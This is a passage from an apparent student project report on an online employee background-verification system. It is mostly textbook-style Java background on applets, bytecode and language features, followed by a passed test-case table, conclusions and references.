application is a program that runs on your computer, under the operating system of that
computer. That is, an application created by Java is more or less like one created using C
or C++. When used to create applications, Java is not much different from any other
computer language. Rather, it is Java's ability to create applets that makes it important.
An applet is an application designed to be transmitted over the Internet and executed by
a Java-compatible Web browser. An applet is actually a tiny Java program, dynamically
downloaded across the network, just like an image, sound file, or video clip. The
important difference is that an applet is an intelligent program, not just an animation or
media file. In other words, an applet is a program that can react to user input and

dynamically change—not just run the same animation or sound over and over. As xciting
as applets are, they would be nothing more than wishful thinking if Java were not able to
address the two fundamental problems associated with them: security and portability.
Before continuing, let's define what these two terms mean relative to the Internet.
Security:
As you are likely aware, every time that you download a "normal" program, you are
risking a viral infection. Prior to Java, most users did not download executable programs
frequently, and those who did scanned them for viruses prior to execution. Even so, most
users still worried about the possibility of infecting their systems with a virus. In addition
to viruses, another type of malicious program exists that must be guarded against. This
type of program can gather private information, such as credit card numbers, bank
account balances, and passwords, by searching the contents of your computer's local file
system. Java answers both of these concerns by providing a "firewall" between a
networked application and your computer. When you use a Java-compatible Web
browser, you can safely download Java applets without fear of viral infection or
malicious intent. Java achieves this protection by confining a Java program to the Java
execution environment and not allowing it access to other parts of the computer. (You
will see how this is accomplished shortly.) The ability to download applets with
confidence that no harm will be done and that no security will be breached is considered
by many to be the single most important aspect of Java.
Portability:
As discussed earlier, many types of computers and operating systems are in use
throughout the world—and many are connected to the Internet. For programs to be
dynamically downloaded to all the various types of platforms connected to the Internet,
some means of generating portable executable code is needed. As you will soon see, the
same mechanism that helps ensure security also helps create portability. Indeed, Java's
solution to these two problems is both elegant and efficient.
Java's Magic: The Bytecode:

The key that allows Java to solve both the security and the portability problems just
described is that the output of a Java compiler is not executable code. Rather, it is
bytecode. Bytecode is a highly optimized set of instructions designed to be executed by
the Java run-time system, which is called the Java Virtual Machine (JVM). That is, in its
standard form, the JVM is an interpreter for bytecode. This may come as a bit of a
surprise. As you know, C++ is compiled to executable code. In fact, most modern
languages are designed to be compiled, not interpreted—mostly because of performance
concerns. However, the fact that a Java program is executed by the JVM helps solve the
major problems associated with downloading programs over the Internet. Here is why.
Translating a Java program into bytecode helps makes it much easier to run a program in
a wide variety of environments. The reason is straightforward: only the JVM needs to be
implemented for each platform. Once the run-time package exists for a given system, any
Java program can run on it. Remember, although the details of the JVM will differ from
platform to platform, all interpret the same Java bytecode. If a Java program were
compiled to native code, then different versions of the same program would have to exist
for each type of CPU connected to the Internet. This is, of course, not a feasible solution.
Thus, the interpretation of bytecode is the easiest way to create truly portable programs.
The fact that a Java program is interpreted also helps to make it secure. Because the
execution of every Java program is under the control of the JVM, the JVM can contain
the program and prevent it from generating side effects outside of the system. As you
will see, safety is also enhanced by certain restrictions that exist in the Java language.
Then a program is interpreted, it generally runs substantially slower than it would run if
compiled to executable code. However, with Java, the differential between the two is not
so great. The use of bytecode enables the Java run-time system to execute programs
much faster than you might expect. Although Java was designed for interpretation, there
is technically nothing about Java that prevents on-the-fly compilation of bytecode into
native code. Along these lines, Sun has just completed its Just In Time (JIT) compiler for
bytecode, which is included in the Java 2 release. When the JIT compiler is part of the
JVM, it compiles bytecode into executable code in real time, on a piece-by-piece,
demand basis. It is important to understand that it is not possible to compile an entire
Java program into executable code all at once, because Java performs various run-time
checks that can be done only at run time. Instead, the JIT compiles code as it is needed,
during execution. However, the just-in-time approach still yields a significant
performance boost. Even when dynamic compilation is applied to bytecode, the

portability and safety features still apply, because the run-time system (which performs
the compilation) still is in charge of the execution environment. Whether your Java
program is actually interpreted in the traditional way or compiled on-the-fly, its
functionality is the same.
The Java Features:
The main important features that Java provides are:
•Simple
•Secure
•Portable
•Object-oriented
•Robust
•Multithreaded
•Architecture-neutral
•Interpreted
•High performance
•Distributed
•Dynamic
Simple:
Java was designed to be easy for the professional programmer to learn and use
effectively. Assuming that you have some programming experience, you will not find
Java hard to master. If you already understand the basic concepts of object-oriented
programming, learning Java will be even easier. Best of all, if you are an experienced C+
+ programmer, moving to Java will require very little effort. Because Java inherits the
C/C++ syntax and many of the object-oriented features of C++, most programmers have
little trouble learning Java. Also, some of the more confusing concepts from C++ are
either left out of Java or implemented in a cleaner, more approachable manner. Beyond ts
similarities with C/C++, Java has another attribute that makes it easy to learn: it makes
an effort not to have surprising features. In Java, there are a small number of clearly
defined ways to accomplish a given task.
Object-Oriented:

Although influenced by its predecessors, Java was not designed to be source-code
compatible with any other language. This allowed the Java team the freedom to design
with a blank slate. One outcome of this was a clean, usable, pragmatic approach to
objects. Borrowing liberally from many seminal object-software environments of the last
few decades, Java manages to strike a balance between the purist's "everything is an
object" paradigm and the pragmatist's "stay out of my way" model. The object model in
Java is simple and easy to extend, while simple types, such as integers, are kept as high
performance non objects.
Robust:
The multi-platformed environment of the Web places extraordinary demands on a
program, because the program must execute reliably in a variety of systems. Thus, the
ability to create robust programs was given a high priority in the design of Java. To gain
reliability, Java restricts you in a few key areas, to force you to find your mistakes early
in program development. At the same time, Java frees you from having to worry about
many of the most common causes of programming errors. Because Java is a strictly
typed language, it checks your code at compile time. However, it also checks your code
at run time. In fact, many hard-to-track-down bugs that often turn up in hard-to-
reproduce run-time situations are simply impossible to create in Java. Knowing that what
you have written will behave in a predictable way under diverse conditions is a key
feature of Java. To better understand how Java is robust, consider two of the main
reasons for program failure: memory management mistakes and mishandled exceptional
conditions (that is, run-time errors). Memory management can be a difficult, tedious task
in traditional programming environments. For example, in C/C++, the programmer must
manually allocate and free all dynamic memory. This sometimes leads to problems,
because programmers will either forget to free memory that has been previously
allocated or, worse, try to free some memory that another part of their code is still using.
Java virtually eliminates these problems by managing memory allocation and
deallocation for you. (In fact, deallocation is completely automatic, because Java
provides garbage collection for unused objects.) Exceptional conditions in traditional
environments often arise in situations such as division by zero or "file not found," and
they must be managed with clumsy and hard-to-read constructs. Java helps in this area

by providing object-oriented exception handling. In a well-written Java program, all run-
time errors can—and should— be managed by your program.

Multithreaded:
Java was designed to meet the real-world requirement of creating interactive, networked
programs. To accomplish this, Java supports multithreaded programming, which allows
you to write programs that do many things simultaneously. The Java run-time system
comes with an elegant yet sophisticated solution for multiprocess synchronization that
enables you to construct smoothly running interactive systems. Java's easy-to-use
approach to multithreading allows you to think about the specific behavior of your
program, not the multitasking subsystem.
Architecture-Neutral:
A central issue for the Java designers was that of code longevity and portability. One of
the main problems facing programmers is that no guarantee exists that if you write a
program today, it will run tomorrow—even on the same machine. Operating system
upgrades, processor upgrades, and changes in core system resources can all combine to
make a program malfunction. The Java designers made several hard decisions in the Java
language and the Java Virtual Machine in an attempt to alter this situation. Their goal
was "write once; run anywhere, any time, forever." To a great extent, this goal was
accomplished.
Interpreted and High Performance:
As described earlier, Java enables the creation of cross-platform programs by compiling
into an intermediate representation called Java bytecode. This code can be interpreted on
any system that provides a Java Virtual Machine. Most previous attempts at cross
platform solutions have done so at the expense of performance. Other interpreted
systems, such as BASIC, Tcl, and PERL, suffer from almost insurmountable
performance deficits. Java, however, was designed to perform well on very low-power
CPUs. As explained earlier, while it is true that Java was engineered for interpretation,
the Java bytecode was carefully designed so that it would be easy to translate directly
into native machine code for very high performance by using a just-in-time compiler.
Java run-time systems that provide this feature lose none of the benefits of the platform-
independent code. "High-performance cross-platform" is no longer an oxymoron.

Distributed:
Java is designed for the distributed environment of the Internet, because it handles
TCP/IP protocols. In fact, accessing a resource using a URL is not much different from
accessing a file. The original version of Java (Oak) included features for intra-address
space messaging. This allowed objects on two different computers to execute procedures
remotely. Java has recently revived these interfaces in a package called Remote Method
Invocation (RMI). This feature brings an unparalleled level of abstraction to client/server
programming.
Dynamic:
Java programs carry with them substantial amounts of run-time type information that is
used to verify and resolve accesses to objects at run time. This makes it possible to
dynamically link code in a safe and expedient manner. This is crucial to the robustness of
the applet environment, in which small fragments of bytecode may be dynamically
updated on a running system.

6.TESTING
The system test cases mentioned below are expected to work and give the
expected behavior if the explorer is configured to run jar files as mentioned in the
project folder. The necessary library files and standard jar files are in the
appropriate project directories and the path and class path environment variables
are appropriately set.

T
es
t
C
N
o
Input Expected
Behavior
Observ
ed
behavi
or
Status
P =
Passed F
= Failed
1
Login as manager
with correct login
details
Home page for
manager should be
displayed
-do- P
2
Enter the wrong
user name and
password for
administrator
The error message
should be displayed-do- P
3
Add a New
Entry for an
User
It should add a
new record in the
database with new
user details
-do- P
4 Delete Entry It should delete an
existing user from
the database
-do- P
5
View the list of
users
It should display
the list of current
available users
-do- P
6 Generate
candidate marks
details at SSC
level
List of SSC
candidates details
displayed
-do- P
7 Generate
candidate marks
details report at
Intermediate
level
List of Intermediate
candidates details
displayed
-do- P

8
Generate
candidate details
report at
University level
It should display
the list of users
at details
university
levels
-do- P
9 Generate
employee report
It should display
the report for
employee
working
in an organization
-do- P
10 Enquiry for the user
information
It should display
report for the user
information
-do- P
11 Login as OperatorIt should display
operator home
page
-do- P

7.CONCLUSIONS AND FUTURE ENHANCEMENTS
Presently we designed our project to be very user friendly. Many features enhanced to
the present companies and helps the organizations and business HR people by getting the
candidates, the project makes it one of an interactive online platform for background
verification of an employee at the time of placements. With this project the concern
organization will save their time in getting the background information of candidates.
By this way it is very helpful to company HR’s to eliminate fraud candidates at the time
of interviews. The documentation that has enclosed can enable even a person with
minimum knowledge to understand it well.
FUTURE SCOPE
⮚Extending the project to Mobile Mailing System.
⮚Providing User Customizations in the mailing system.

8.ANNEXURE
8.1.SCREENS

8.2.REFERENCES
1.Roger S Pressman, “Software Engineering – A Practitioner’s approach” McGraw –
Hill International Editions, Fifth Edition, 2001.
2.Henry F Korth, S. Sudharshan, “Database System Concepts” McGraw – Hill
International Editions, Fourth Edition, 2002.
3.George Koch, Kevin Loney, “Oracle – The Complete Reference”, Tata McGraw Hill,
Third Edition, 2001.
4.Herbert Schildt & Patrick Naughton, “Java2 Complete Reference”, Tmh 3/e, 1999.
5.James Jawroski, “Mastering Java Script”, Tmh 3/e, 2000.
6.JSP Architecture “Karl Avedal”, Tata McGraw – Hill International Editions, Fourth
Edition, 2002.
WEB SITES REFERRED:
www.roseindia.net/jsp/jsp.html
www.w3schools.com
www.jsptut.com
www.htmlref.com